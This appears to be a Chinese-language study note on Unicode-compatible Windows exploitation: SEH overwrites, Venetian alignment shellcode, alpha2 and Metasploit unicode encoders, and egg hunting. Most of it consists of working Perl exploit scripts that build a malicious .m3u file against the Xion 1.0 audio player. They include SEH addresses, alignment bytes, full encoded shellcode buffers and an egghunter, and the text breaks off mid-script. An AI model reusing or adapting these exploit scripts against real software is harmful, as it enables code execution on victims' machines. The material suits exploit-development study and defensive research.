unicode exp学习
UNICODE 会自动插入NULL字符
1)覆盖ret控制
寻找 形似 0x00nn00mm 的 jmp xxx 的地址 可以jmo 到shellcode执行
2)基于SEH 控制EIP+SHORT JMP
寻找 pop pop ret 不包含>7f 的入口地址 用来覆盖SEH header
先将 nseh 置为 \xcc\xcc 再来寻找 两字节的 short jmp
3)基于SEH jmp
不用 short jmp 使用一些无害代码来覆盖NSEH 以使其能够执行到被覆写的SEH 结构之后,
然后再被执行代码放置于诶覆盖的SEH结构之后,这样跳过nseh + seh之后就执行我们的代码
需要如下
(1) 无害指令 放置在 nseh(2)“unicode compatible” 地址用来覆盖 seh hander ,并且执行它不会造成任何伤害
当 ASCii 码 >7f 时,unicode 转换后都会变为完全不同的值,eg:0x80 -> 1a20 -》 可以构造成0x00nn1a20
ascii shellcode _> unicode shellcode:
1) 查找等效 ASCII并跳转到该:
ascii 被载入内存后,都会变为 unicode,因此在其中找到ascii版本的shellcode,如果能控制EIP 使其跳转到指定地址
那么就有可能实现exploit。 如果无法到达,那么控制某一寄存器的内容,跳转到那个寄存器,放置一些跳转指令,使其跳转到ASCII版本的shellcode
2)编写自己的unicode-compatible shellcode
3)使用编码器
将ASCII-》unicode 并在其前端放上解码器,经解码后 就可以生产原始 代码并执行了
(1)通过特定的内存地址上重构原始代码,然后跳转到那个地址
其中某个寄存器必须指向 decoder+shellcode 的入口地址,另一个寄存器必须指向可写的内存地址(shellcode)
(2)通过改变代码执行流程,使其运行到重构的shellcode上
使用一个指向 decoder+shellcode的入口地址的寄存器即可,同时让原始shellcode经重构后保存在该处
工具学习:
1)makeunicode2.py 不会····
2)vense.pl 下载地址: http://www.phenoelit-us.org/win
生成一字节 字符串,包含decoder+原始shellcode,,为了使用docoder,还需要设置 寄存器
1个寄存器直接指向 buffer 入口地址 用于存放vense.pl 生成的shellcode 2 个寄存器需要指向一段可写可执行 的内存地址,能够向内写入数据
shellcode 入口地址 = eax 可写地址 = edi
改写 $secondstage 为 metasploit 生成的perl shellcode 并解码后可以正常执行
运行脚本 1)显示原始 shellcode 2)新生成的shellcode 包含decoder
将新生成shellcode放入 exploit 确保 eax->shellcode 入口地址 !!!这里需要重新调整寄存器,并视同unicode-compatible代码实现跳转 ,方法点击这里,
寄存器设置好了之后,运行 jmp eax ,解码器就是提取出原始的shellcode 并执行它
注意:
(1)不能再不是UNIICODE EXP 上运用 (2)虽然脚本中使用算法是经makeunicode2改善后的版本,但依然会生成很长的shellcode,所以要求的缓冲区很大
3)alpha2 下载地址: http://download.csdn.net/detail/hksoobe/4803452
同时也包含在 MSF中,将会把shellcode包裹在 decoder 之中
(1)只需要指定 shellcode入口的寄存器,唔需要指向可写可执行地址的寄存器
(2)decoder 并不包含在原来代码中,decoder可自我修改,而且要求的缓冲区空间也比较小
MSF中的没下载不用··························
root@bt:~/Desktop# ./alpha2 eax --unicode --uppercase < 1.bin
root@bt:~/Desktop# ./alpha2 --help
Usage: ./alpha2 [OPTION] [BASEADDRESS]
ALPHA 2 encodes your IA-32 shellcode to contain only alphanumeric characters.
The result can optionaly be uppercase-only and/or unicode proof. It is a encoded
version of your origional shellcode. It consists of baseaddress-code with some
padding, a decoder routine and the encoded origional shellcode. This will work
for any target OS. The resulting shellcode needs to have RWE-access to modify
it's own code and decode the origional shellcode in memory.BASEADDRESSThe decoder routine needs have it's baseaddress in specified register(s). Thebaseaddress-code copies the baseaddress from the given register or stacklocation into the apropriate registers.
eax, ecx, edx, ecx, esp, ebp, esi, ediTake the baseaddress from the given register. (Unicode baseaddress code usingesp will overwrite the byte of memory pointed to by ebp!)
[esp], [esp-X], [esp+X]Take the baseaddress from the stack.
sehThe windows "Structured Exception Handler" (seh) can be used to calculatethe baseaddress automatically on win32 systems. This option is not availablefor unicode-proof shellcodes and the uppercase version isn't 100% reliable.
nopsNo baseaddress-code, just padding. If you need to get the baseaddress from asource not on the list use this option (combined with --nocompress) andreplace the nops with your own code. The ascii decoder needs the baseaddressin registers ecx and edx, the unicode-proof decoder only in ecx.
-nDo not output a trailing newline after the shellcode.
--nocompressThe baseaddress-code uses "dec"-instructions to lower the required paddinglength. The unicode-proof code will overwrite some bytes in front of theshellcode as a result. Use this option if you do not want the "dec"-s.
--unicodeMake shellcode unicode-proof. This means it will only work when it getsconverted to unicode (inserting a '0' after each byte) before it getsexecuted.
--uppercaseMake shellcode 100% uppercase characters, uses a few more bytes thenmixedcase shellcodes.
--sourcesOutput a list of BASEADDRESS options for the given combination of --uppercaseand --unicode.
--helpDisplay this help and exit
--versionOutput version information and exitSee the source-files for further details and copying conditions. There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.Acknowledgements:Thanks to rix for his phrack article on aphanumeric shellcode.Thanks to obscou for his phrack article on unicode-proof shellcode.Thanks to Costin Ionescu for the idea behind w32 SEH GetPC code.Report bugs to <skylined@edup.tudelft.nl>4) metasploit
root@bt:/opt/framework/msf3# ./msfpayload windows/exec CMD=calc R |
> ./msfencode -e x86/alpha_mixed -t raw |
> ./msfencode -e x86/unicode_upper BufferRegister=EAX -t perl
[*] x86/alpha_mixed succeeded with size 454 (iteration=1)[*] x86/unicode_upper succeeded with size 1039 (iteration=1)my $buf =
"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x51\x41" .
"\x54\x41\x58\x41\x5a\x41\x50\x55\x33\x51\x41\x44\x41\x5a" .
"\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51\x41\x49" .
"\x41\x51\x41\x50\x41\x35\x41\x41\x41\x50\x41\x5a\x31\x41" . 省略····
1)只能有一套限定的指令集
2)避免NULL 字符,要求添加NULL后的shellcode仍然可正常运行
3)机器码对齐问题
venetian shellcode 技术
确保NULL和指令以正确的放上对齐
单字节转换为UNICODE编码时不被 破坏寄存器或者指令 还不行的话 查看 http://phrack.org/issues/61/11.html#article
00 6e 00:add byte ptr [esi],ch
00 6f 00:add byte ptr [edi],ch
00 70 00:add byte ptr [eax],ch
00 71 00:add byte ptr [ecx],ch
00 72 00:add byte ptr [edx],ch
00 73 00:add byte ptr [ebx],ch
00 62 00:add byte ptr [edx],ah
00 6d 00:add byte ptr [ebp],ch1)假设ESI 指向可写地址
假设 ASCII 版本的shellcode 在 0x33445566,eax 写入它 perl 脚本:
my $align = "\xb8\x44\xaa"; #mov eax,0x0AA004400
$align=$align."\x6e"; #nop/align nullbytes
$align=$align."\x50"; #push eax
$align=$align."\x6e"; #nop/align nullbytes
$align=$align."\x4c"; #dec esp
$align=$align."\x6e"; #nop/align nullbytes
$align=$align."\x58"; #pop eax ,eax=0x004400??
$align=$align."\x6e"; #nop/align nullbytes
$align=$align."\x05\x55\x33"; #add eax,33005500h ,eax=0x334455??
$align=$align."\x6e"; #nop/align nullbytes
$align=$align."\xb0"; #mov al,0
#no alignment needed between these 2!
$align=$align."\xb9\x66\xaa"; #mov ecx,AA006600h ,eax =0x33445500
$align=$align."\xe8"; #add al,ch ,eax =0x33445566
#接下来就是 jmp eax
$align=$align."\xe8"; #add al,ch ,eax =0x33445566
$align=$align."\x6e"; #nop/align nullbytes
!!!注意 这里 有一个错误 0xc3 转换为unicode时不慎0xc3了
所以一般直接走到shellcode
但是 http://bbs.pediy.com/showthread.php?t=126344
说的有可能构造出 c3
'\x72\xcb\x72' #ret 转换成'\x72\x00\xc3\x85\x41\x00'
2) 假设 ebp+0x100 放入eax 之后调到EAX 去执行代码,那么就先写入一些汇编指令
00401580 > 55 push ebp
00401581 58 pop eax
00401582 05 00140011 add eax,0x11001400
00401587 2D 00130011 sub eax,0x11001300 EBP+0x100利用 venetian shellcode 技术构造 以上代码
\x6e #nop/align nullbytes
\x55 #push ebp
\x6e #nop/align nullbytes
\x58 #pop eax
\x6e #nop/align nullbytes
\x05\x14\x11 #add eax,0x11001400
\x6e #nop/align nullbytes
\x2d\x13\x11 #sub eax,0x11001300
\x6e #nop/align nullbytes
这里准备一个例子 : xion 1.0 build120:
用OD调试出来是 0x235
然后
!pvefindaddr p2
#Found pop esi - pop ebx - ret at 0x0043003B [xion.exe] ** Unicode compatible ** ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **] - C:\Program Files\r2 Studios\Xion\Xion.exe
#Found pop esi - pop ebp - ret at 0x00470034 [xion.exe] ** Unicode compatible ** ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **] - C:\Program Files\r2 Studios\Xion\Xion.exe
#Found pop edi - pop esi - ret at 0x00480063 [xion.exe] ** Unicode compatible ** ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **] - C:\Program Files\r2 Studios\Xion\Xion.exe
不能要 >7f 的字节
这里选择 0x00470034
下来这个是WINDBG找出来的,还不算成功呢 调试才能成功运行shellcode
my $file = "test.m3u";
#my $junk = "A"x270;my $nseh = "\x61\x62";#61 is popad 62为align bytes
my $seh = "\x34\x47";#"\x34\x47";pop pop ret
#Found pop esi - pop ebx - ret at 0x0043003B [xion.exe] ** Unicode compatible ** ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **] - C:\Program Files\r2 Studios\Xion\Xion.exe
#Found pop esi - pop ebp - ret at 0x00470034 [xion.exe] ** Unicode compatible ** ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **] - C:\Program Files\r2 Studios\Xion\Xion.exe
#Found pop edi - pop esi - ret at 0x00480063 [xion.exe] ** Unicode compatible ** ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **] - C:\Program Files\r2 Studios\Xion\Xion.exemy $VenetianShellcode ="\x6e";$VenetianShellcode =$VenetianShellcode."\x55";#55 push ebp$VenetianShellcode =$VenetianShellcode."\x6e";$VenetianShellcode =$VenetianShellcode."\x58";#58 pop eax$VenetianShellcode =$VenetianShellcode."\x6e";$VenetianShellcode =$VenetianShellcode."\x05\x14\x11";#05 00140011 add eax,0x11001400$VenetianShellcode =$VenetianShellcode."\x6e";$VenetianShellcode =$VenetianShellcode."\x2d\x13\x11";#2D 00130011 sub eax,0x11001300 EBP+0x100$VenetianShellcode =$VenetianShellcode."\x6e";
#229fe54 - 229fd76 = DE = 222 just need 111 不能用push eax ret c3不能正确转换为c3#1)"\x43\x6e" inc ebx ,add byte ptr [esi],ch
my $junk2 = "\x70"x111; #2)"\x70" jo xxx 1,2都可以用来作为nop来对齐地址为eax ,指向shellcode第一字节
#缓冲区为 1840bits 从这里开始 而shellcode为 1037bits *2 = 2074 所以shellcode分为两段
my $buf =
"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x51\x41" .
"\x54\x41\x58\x41\x5a\x41\x50\x55\x33\x51\x41\x44\x41\x5a" .
"\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51\x41\x49" .
"\x41\x51\x41\x50\x41\x35\x41\x41\x41\x50\x41\x5a\x31\x41" .
"\x49\x31\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49" .
"\x41\x58\x41\x35\x38\x41\x41\x50\x41\x5a\x41\x42\x41\x42" .
"\x51\x49\x31\x41\x49\x51\x49\x41\x49\x51\x49\x31\x31\x31" .
"\x31\x41\x49\x41\x4a\x51\x49\x31\x41\x59\x41\x5a\x42\x41" .
"\x42\x41\x42\x41\x42\x41\x42\x33\x30\x41\x50\x42\x39\x34" .
"\x34\x4a\x42\x43\x59\x5a\x42\x49\x49\x58\x4b\x5a\x39\x52" .
"\x52\x4b\x44\x52\x39\x51\x39\x51\x39\x51\x39\x51\x39\x51" .
"\x39\x51\x39\x50\x49\x51\x39\x51\x39\x51\x39\x50\x49\x51" .
"\x33\x50\x43\x50\x43\x51\x33\x51\x33\x51\x33\x50\x37\x50" .
"\x51\x50\x5a\x52\x4a\x51\x31\x50\x58\x52\x30\x50\x30\x51" .
"\x31\x50\x30\x51\x31\x52\x4b\x51\x31\x51\x31\x52\x31\x50" .
"\x32\x51\x31\x51\x32\x50\x32\x50\x42\x51\x32\x50\x30\x51" .
"\x32\x51\x32\x51\x31\x50\x42\x52\x38\x50\x50\x50\x38\x51" .
"\x31\x51\x32\x43\x45\x50\x4a\x50\x49\x50\x49\x52\x4c\x50" .
"\x58\x43\x38\x50\x4b\x50\x39\x51\x37\x54\x30\x50\x43\x50" .
"\x30\x50\x45\x52\x30\x52\x31\x54\x30\x50\x4c\x51\x39\x50" .
"\x4d\x50\x35\x52\x30\x50\x31\x52\x38\x51\x42\x51\x33\x52" .
"\x34\x50\x4e\x52\x4b\x50\x50\x52\x32\x50\x56\x50\x50\x50" .
"\x4c\x50\x4b\x52\x32\x52\x52\x52\x34\x50\x4c\x50\x4e\x52" .
"\x4b\x52\x30\x51\x42\x50\x56\x43\x44\x50\x4c\x50\x4b\x50" .
"\x50\x43\x42\x50\x51\x50\x38\x51\x46\x52\x4f\x50\x4d\x52" .
"\x47\x50\x43\x43\x4a\x52\x36\x50\x46\x50\x56\x52\x31\x50" .
"\x49\x52\x4f\x50\x56\x50\x51\x50\x4b\x52\x50\x50\x4c\x52" .
"\x4c\x51\x35\x52\x4c\x50\x51\x52\x51\x50\x51\x52\x4c\x52" .
"\x34\x51\x32\x51\x46\x50\x4c\x50\x45\x52\x50\x50\x4b\x52" .
"\x51\x52\x38\x50\x4f\x50\x56\x52\x4d\x51\x33\x50\x31\x51" .
"\x48\x51\x37\x50\x4d\x50\x32\x50\x5a\x52\x30\x52\x36\x50" .
"\x32\x50\x52\x54\x37\x50\x4e\x52\x4b\x52\x31\x51\x32\x50" .
"\x56\x52\x50\x50\x4c\x50\x4b\x50\x52\x43\x32\x51\x35\x52" .
"\x4c\x51\x35\x52\x31\x50\x58\x50\x50\x50\x4c\x50\x4b\x50" .
"\x43\x52\x50\x52\x31\x51\x58\x50\x4f\x52\x55\x50\x4b\x54" .
"\x30\x52\x31\x43\x34\x51\x33\x52\x5a\x51\x46\x51\x51\x50" .
"\x5a\x52\x50\x51\x46\x50\x30\x50\x4c\x50\x4b\x50\x43\x54" .
"\x38\x50\x56\x43\x48\x50\x4e\x52\x4b\x50\x50\x50\x58\x50" .
"\x51\x50\x30\x51\x37\x54\x31\x50\x4b\x51\x53\x51\x39\x52" .
"\x53\x50\x47\x50\x4c\x50\x52\x43\x39\x50\x4c\x50\x4b\x51" .
"\x35\x43\x34\x50\x4c\x50\x4b\x50\x47\x54\x31\x50\x5a\x54" .
"\x36\x50\x45\x43\x31\x51\x39\x52\x4f\x50\x50\x50\x31\x50" .
"\x4b\x52\x50\x50\x4c\x52\x4c\x50\x5a\x43\x31\x52\x38\x50" .
"\x4f\x51\x44\x50\x4d\x51\x33\x50\x31\x52\x38\x50\x47\x50" .
"\x47\x51\x38\x50\x4b\x50\x50\x52\x30\x43\x45\x50\x5a\x50" .
"\x54\x50\x56\x43\x33\x50\x43\x50\x4d\x50\x58\x54\x38\x50" .
"\x47\x50\x4b\x52\x31\x52\x4d\x51\x35\x43\x44\x52\x34\x50" .
"\x35\x50\x5a\x50\x42\x51\x46\x50\x38\x50\x4e\x52\x4b\x52" .
"\x36\x50\x38\x51\x46\x51\x34\x51\x37\x54\x31\x51\x4a\x54" .
"\x33\x50\x50\x52\x46\x50\x4c\x50\x4b\x50\x54\x50\x4c\x52" .
"\x30\x50\x4b\x50\x4e\x52\x4b\x50\x56\x50\x38\x51\x35\x50" .
"\x4c\x50\x47\x52\x51\x51\x48\x50\x53\x50\x4e\x52\x4b\x50" .
"\x47\x54\x34\x50\x4c\x50\x4b\x51\x46\x51\x51\x52\x38\x52" .
"\x30\x50\x4f\x54\x39\x52\x30\x51\x34\x50\x47\x52\x34\x50" .
"\x54\x43\x34\x50\x43\x52\x4b\x52\x31\x50\x4b\x50\x51\x54" .
"\x31\x52\x30\x50\x59\x50\x50\x50\x5a\x51\x33\x43\x31\x51" .
"\x39\x52\x4f\x50\x4b\x52\x30\x50\x50\x52\x38\x51\x33\x52" .
"\x4f\x51\x42\x52\x5a\x50\x4e\x52\x4b\x50\x45\x50\x42\x51" .
"\x48\x52\x4b\x50\x4e\x52\x46\x52\x31\x50\x4d\x52\x30\x51" .
"\x5a\x51\x33\x50\x31\x50\x4c\x50\x4d\x50\x4e\x52\x45\x50" .
"\x4e\x50\x59\x50\x47\x52\x50\x50\x45\x52\x30\x50\x45\x50" .
"\x50\x50\x56\x50\x30\x50\x45\x50\x38\x52\x34\x54\x31\x50" .
"\x4e\x52\x4b\x52\x32\x50\x4f\x50\x4c\x50\x47\x50\x4b\x50" .
"\x4f\x50\x58\x50\x55\x50\x4d\x52\x4b\x51\x48\x52\x50\x50" .
"\x4e\x50\x55\x50\x4e\x50\x42\x51\x42\x43\x46\x51\x33\x51" .
"\x48\x51\x39\x50\x36\x50\x4d\x50\x45\x50\x4d\x52\x4d\x50" .
"\x4f\x52\x4d\x50\x4b\x50";#junk
my $junk =
"\x4f\x50\x4b\x51\x55\x50\x45\x52" .
"\x4c\x51\x33\x50\x36\x50\x51\x52\x4c\x52\x36\x51\x5a\x50" .
"\x4f\x54\x30\x50\x4b\x50\x4b\x50\x4b\x52\x30\x52\x32\x52" .
"\x35\x51\x37\x52\x55\x50\x4f\x50\x4b\x52\x31\x50\x57\x52" .
"\x32\x50\x33\x50\x50\x43\x42\x50\x50\x52\x4f\x51\x42\x50" .
"\x4a\x51\x35\x52\x30\x50\x56\x50\x33\x51\x39\x52\x4f\x51" .
"\x39\x51\x35\x50\x45\x50\x33\x50\x51\x54\x31\x52\x30\x52" .
"\x4c\x50\x43\x50\x53\x51\x35\x52\x30\x51\x31\x51\x31\x41" .
"\x41";
$junk = $junk."A"x(270-length($junk));my $junk3 = "\x42"x(5000-length($junk.$nseh.$seh.$VenetianShellcode.$junk2.$buf));my $payload = $junk.$nseh.$seh.$VenetianShellcode.$junk2.$buf.$junk3;
open($FILE,">$file");
print $FILE $payload;
close($FILE); 运用自己的shellcode 加密成为 unicode 能用的shellcode
root@bt:/opt/framework/msf3# cat exploit.m3u | ./msfencode -e x86/alpha_mixed -t raw | ./msfencode -e x86/unicode_upper BufferRegister=EAX -t perl
[*] x86/alpha_mixed succeeded with size 277 (iteration=1)[*] x86/unicode_upper succeeded with size 685 (iteration=1)my $buf =
"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x51\x41" .···省略下面这个才是正确的 POC 问题在于: windbg和OD(正常) 的调试出来的POC不一样这是怎么一回事呢
而且windbg调试出来的POC 肯定是错误的! OD调试出来的才是正确的
1) 寻找 unicode 形式的 pop pop ret 覆盖 SEH handler !pvefindaddr p2 可以找到
2) nseh 用 popad 可以得到 寄存器+偏移 指向 我们输入的字符串某一位置
3) 构造 VenetianShllcode 使得 eax = 我们输入的字符串某一位置
4) 构造 nop/align 得到 eax= shellcode起始第一字节
5) 用生成的unicode shellcode , eax = shellcode起始 ,执行shellcode shellcode = 解码器+代码
my $file = "test.m3u";#perl
#my $junk = "A"x270;my $nseh = "\x61\x62";#61 is popad 62为align bytes
my $seh = "\x34\x47";#"\x34\x47";pop pop ret
#Found pop esi - pop ebx - ret at 0x0043003B [xion.exe] ** Unicode compatible ** ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **] - C:\Program Files\r2 Studios\Xion\Xion.exe
#Found pop esi - pop ebp - ret at 0x00470034 [xion.exe] ** Unicode compatible ** ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **] - C:\Program Files\r2 Studios\Xion\Xion.exe
#Found pop edi - pop esi - ret at 0x00480063 [xion.exe] ** Unicode compatible ** ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **] - C:\Program Files\r2 Studios\Xion\Xion.exemy $VenetianShellcode ="\x6e";$VenetianShellcode =$VenetianShellcode."\x55";#55 push ebp$VenetianShellcode =$VenetianShellcode."\x6e";$VenetianShellcode =$VenetianShellcode."\x58";#58 pop eax$VenetianShellcode =$VenetianShellcode."\x6e";$VenetianShellcode =$VenetianShellcode."\x05\x14\x11";#05 00140011 add eax,0x11001400$VenetianShellcode =$VenetianShellcode."\x6e";$VenetianShellcode =$VenetianShellcode."\x2d\x13\x11";#2D 00130011 sub eax,0x11001300 EBP+0x100$VenetianShellcode =$VenetianShellcode."\x6e";
#229fe54 - 229fd76 = DE = 222 just need 111 不能用push eax ret c3不能正确转换为c3my $junk2 = "\x48\x6e"x42; #1)"\x43\x6e" inc ebx ,add byte ptr [esi],ch $junk2 = $junk2."\x70"x6; #2)"\x70" jo xxx 1,2都可以用来作为nop来对齐地址为eax ,指向shellcode第一字节
#缓冲区为 1840bits 从这里开始 而shellcode为 1037bits *2 = 2074 所以shellcode分为两段
my $buf =
"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x51\x41" .
"\x54\x41\x58\x41\x5a\x41\x50\x55\x33\x51\x41\x44\x41\x5a" .
"\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51\x41\x49" .
"\x41\x51\x41\x50\x41\x35\x41\x41\x41\x50\x41\x5a\x31\x41" .
"\x49\x31\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49" .
"\x41\x58\x41\x35\x38\x41\x41\x50\x41\x5a\x41\x42\x41\x42" .
"\x51\x49\x31\x41\x49\x51\x49\x41\x49\x51\x49\x31\x31\x31" .
"\x31\x41\x49\x41\x4a\x51\x49\x31\x41\x59\x41\x5a\x42\x41" .
"\x42\x41\x42\x41\x42\x41\x42\x33\x30\x41\x50\x42\x39\x34" .
"\x34\x4a\x42\x45\x39\x5a\x46\x58\x59\x58\x4e\x58\x59\x54" .
"\x36\x4b\x44\x50\x59\x51\x39\x50\x49\x50\x49\x51\x39\x51" .
"\x39\x51\x39\x50\x49\x50\x49\x50\x49\x51\x39\x51\x39\x51" .
"\x33\x51\x33\x50\x43\x51\x33\x50\x43\x51\x33\x50\x37\x50" .
"\x51\x51\x4a\x52\x4a\x51\x31\x52\x38\x52\x30\x50\x30\x51" .
"\x31\x50\x30\x51\x31\x52\x4b\x51\x31\x51\x31\x50\x51\x50" .
"\x32\x51\x31\x51\x32\x50\x32\x51\x32\x51\x32\x50\x30\x51" .
"\x32\x51\x32\x51\x31\x50\x42\x51\x48\x52\x30\x50\x38\x51" .
"\x31\x50\x42\x43\x45\x50\x4a\x51\x39\x52\x30\x50\x31\x50" .
"\x5a\x52\x52\x51\x48\x50\x32\x50\x54\x54\x30\x52\x32\x51" .
"\x34\x50\x4e\x52\x4b\x51\x44\x52\x32\x50\x4c\x50\x4b\x50" .
"\x51\x51\x32\x52\x36\x52\x4c\x50\x4c\x50\x4b\x51\x33\x51" .
"\x52\x51\x37\x52\x4c\x50\x4e\x52\x4b\x50\x51\x50\x52\x50" .
"\x47\x43\x48\x50\x4e\x52\x4b\x52\x34\x50\x32\x50\x47\x50" .
"\x50\x50\x4c\x50\x4b\x52\x36\x54\x32\x50\x4f\x52\x50\x50" .
"\x51\x52\x4e\x50\x56\x52\x4c\x51\x35\x43\x33\x52\x34\x50" .
"\x35\x51\x39\x52\x42\x50\x4c\x50\x49\x52\x38\x51\x37\x50" .
"\x43\x50\x33\x50\x51\x51\x58\x50\x47\x50\x4c\x50\x4c\x50" .
"\x4b\x52\x30\x50\x57\x52\x32\x50\x58\x50\x45\x50\x51\x50" .
"\x4f\x50\x32\x50\x4e\x52\x4b\x50\x51\x52\x4a\x51\x37\x50" .
"\x50\x51\x35\x50\x51\x50\x4b\x43\x47\x52\x34\x52\x51\x52" .
"\x38\x52\x4d\x50\x4c\x50\x4b\x51\x35\x52\x44\x50\x4e\x50" .
"\x4f\x50\x43\x50\x31\x50\x4b\x54\x36\x50\x52\x52\x45\x50" .
"\x4f\x54\x31\x51\x37\x50\x4e\x51\x37\x50\x36\x52\x30\x51" .
"\x51\x52\x31\x52\x44\x51\x35\x50\x31\x52\x34\x50\x35\x50" .
"\x49\x43\x32\x50\x4b\x50\x31\x52\x31\x52\x4e\x50\x54\x50" .
"\x48\x51\x37\x50\x35\x52\x30\x43\x48\x52\x30\x43\x39\x51" .
"\x42\x51\x44\x52\x30\x52\x55\x50\x58\x52\x49\x50\x4e\x52" .
"\x4b\x50\x43\x50\x4a\x51\x44\x52\x44\x51\x33\x50\x31\x50" .
"\x4f\x50\x37\x50\x50\x43\x36\x50\x4e\x52\x4b\x51\x46\x50" .
"\x4c\x52\x30\x52\x4f\x50\x4c\x50\x4b\x51\x33\x50\x4a\x50" .
"\x47\x52\x4c\x50\x45\x50\x51\x50\x4f\x50\x37\x50\x4c\x50" .
"\x4b\x50\x43\x50\x4c\x50\x4e\x50\x4f\x51\x39\x52\x4c\x51" .
"\x46\x43\x31\x51\x48\x50\x47\x50\x52\x51\x38\x50\x43\x51" .
"\x44\x50\x43\x50\x51\x50\x43\x52\x50\x51\x37\x54\x31\x52" .
"\x30\x43\x38\x50\x47\x50\x30\x50\x54\x50\x30\x51\x35\x50" .
"\x31\x50\x52\x50\x4e\x50\x4b\x50\x39\x50\x4d\x50\x31\x50" .
"\x4b\x50\x4e\x52\x32\x43\x39\x50\x45\x50\x57\x51\x44\x54" .
"\x31\x50\x4b\x54\x30\x50\x56\x50\x31\x52\x30\x50\x50\x50" .
"\x4b\x50\x4f\x50\x5a\x54\x37\x51\x31\x51\x31\x41\x41";#junk
$junk = "A"x235;my $junk3 = "\x42"x(5000-length($junk.$nseh.$seh.$VenetianShellcode.$junk2.$buf));my $payload = $junk.$nseh.$seh.$VenetianShellcode.$junk2.$buf.$junk3;
open($FILE,">$file");
print $FILE $payload;
close($FILE); 下面构造 unicode 版本的 egg hunting egg hunting 可以解决 字符不够用的情况 ,将会覆盖 shellcode到其他地方 然后去找寻 执行
构造shellcode
root@xxx:/opt/framework/msf3# ./msfpayload windows/messagebox TEXT="#pand0#" TITLE="#pand0#" R > /root/Desktop/1.bin
···········································
root@bt:~/Desktop# ./alpha2 eax --unicode --uppercase < 1.bin
PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1A`````````````````````````
my $file = "test.m3u";#perl
#my $junk = "A"x270; my $nseh = "\x61\x62";#61 is popad 62为align bytes
my $seh = "\x34\x47";#"\x34\x47";pop pop ret
#Found pop esi - pop ebx - ret at 0x0043003B [xion.exe] ** Unicode compatible ** ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **] - C:\Program Files\r2 Studios\Xion\Xion.exe
#Found pop esi - pop ebp - ret at 0x00470034 [xion.exe] ** Unicode compatible ** ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **] - C:\Program Files\r2 Studios\Xion\Xion.exe
#Found pop edi - pop esi - ret at 0x00480063 [xion.exe] ** Unicode compatible ** ** Null byte ** - [ Ascii printable] {PAGE_EXECUTE_WRITECOPY} [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **] - C:\Program Files\r2 Studios\Xion\Xion.exe my $VenetianShellcode ="\x6e"; $VenetianShellcode =$VenetianShellcode."\x55";#55 push ebp $VenetianShellcode =$VenetianShellcode."\x6e"; $VenetianShellcode =$VenetianShellcode."\x58";#58 pop eax $VenetianShellcode =$VenetianShellcode."\x6e"; $VenetianShellcode =$VenetianShellcode."\x05\x14\x11";#05 00140011 add eax,0x11001400 $VenetianShellcode =$VenetianShellcode."\x6e"; $VenetianShellcode =$VenetianShellcode."\x2d\x13\x11";#2D 00130011 sub eax,0x11001300 EBP+0x100 $VenetianShellcode =$VenetianShellcode."\x6e";
#229fe54 - 229fd76 = DE = 222 just need 111 不能用push eax ret c3不能正确转换为c3 my $junk2 = "\x48\x6e"x42; #1)"\x43\x6e" inc ebx ,add byte ptr [esi],ch $junk2 = $junk2."\x70"x6; #2)"\x70" jo xxx 1,2都可以用来作为nop来对齐地址为eax ,指向shellcode第一字节
#缓冲区为 1840bits 从这里开始 而shellcode为 1037bits *2 = 2074 所以shellcode分为两段
my $egghunter =
"PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBQVU1XJKOLOQ2R2QZLB0X8MNNOLM5QJ44JO6XM0P0KPT44KKJ6O45IZFO3EJGKOIWA";
#egg 用 \x00\x30\x00\x74
$junk2 = $junk2.$egghunter;
my $garbage = "X"x100; #########################################################垃圾代码############################################my $aligin = "\x6d".
"\x57". #push edi
"\x6d".
"\x58". #pop eax
"\x6d".
"\x05\x14\x11".#05 00140011 add eax,0x11001400
"\x6d".
"\x2d\x13\x11".#2D 00130011 sub eax,0x11001300 eax+0x100
"\x6d".
"\x40". #inc eax
"\x6d".
